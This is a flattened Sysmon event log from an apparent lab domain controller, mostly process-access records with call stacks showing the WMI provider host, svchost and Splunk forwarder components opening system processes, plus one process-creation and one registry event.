16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029860Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029859Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029858Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029857Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029856Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029855Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029854Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029853Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029852Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029851Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:52.155{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029906Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:06.826{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029923Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.920{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5477-6008-C406-00000000A301}6176C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029922Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.920{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029921Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.920{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029920Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.920{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029919Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.920{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029918Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.920{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5477-6008-C406-00000000A301}6176C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029917Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.920{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5477-6008-C406-00000000A301}6176C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029916Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.921{7901BC46-5477-6008-C406-00000000A301}6176C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000029915Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:04:07.530{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ef45-0xe1df581a) 10341000x800000000000000029914Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.248{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5477-6008-C306-00000000A301}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029913Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.248{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029912Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.248{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029911Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:07.248{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029910Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 